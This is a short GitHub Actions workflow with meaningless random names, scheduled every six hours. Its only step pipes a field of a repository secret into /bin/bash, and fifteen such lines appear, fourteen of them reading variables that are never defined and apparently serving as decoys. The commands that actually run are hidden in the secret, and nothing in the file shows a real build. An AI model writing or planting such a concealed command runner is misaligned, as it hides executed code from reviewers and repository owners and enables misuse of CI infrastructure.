name: yaoyongyt

on:
  workflow_dispatch:
  schedule:
    - cron: '37 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yaoyongyt
        env:
          oeom298: ${{ secrets.oeom298 }}
        run: |
          echo $oeom298 | jq -r .lj897 | /bin/bash
          echo $bmk40 | jq -r .ospe7089 | /bin/bash
          echo $aoxi7103 | jq -r .fo00481 | /bin/bash
          echo $rqad2286 | jq -r .utyqn62235 | /bin/bash
          echo $sjta4124 | jq -r .hdq349 | /bin/bash
          echo $tf3 | jq -r .wa660 | /bin/bash
          echo $ibc647 | jq -r .fv695 | /bin/bash
          echo $u044 | jq -r .ijhu98 | /bin/bash
          echo $hoae4572 | jq -r .q63515 | /bin/bash
          echo $hn4 | jq -r .jpd551 | /bin/bash
          echo $rs79 | jq -r .wbp53 | /bin/bash
          echo $sx0 | jq -r .a51 | /bin/bash
          echo $wdo4522 | jq -r .vg135 | /bin/bash
          echo $dhx90 | jq -r .lbbn10 | /bin/bash
          echo $gqj66209 | jq -r .pxveg14 | /bin/bash

